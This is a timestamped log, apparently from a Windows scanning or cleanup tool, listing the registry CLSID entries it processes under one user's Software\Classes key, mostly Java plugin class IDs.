[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.140] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBC}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBB}]
[2014.11.10 19:31:16.155] - INFO: Processing clsid [\Registry\User\S-1-5-21-4159919823-1585328292-427241361-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBC}]
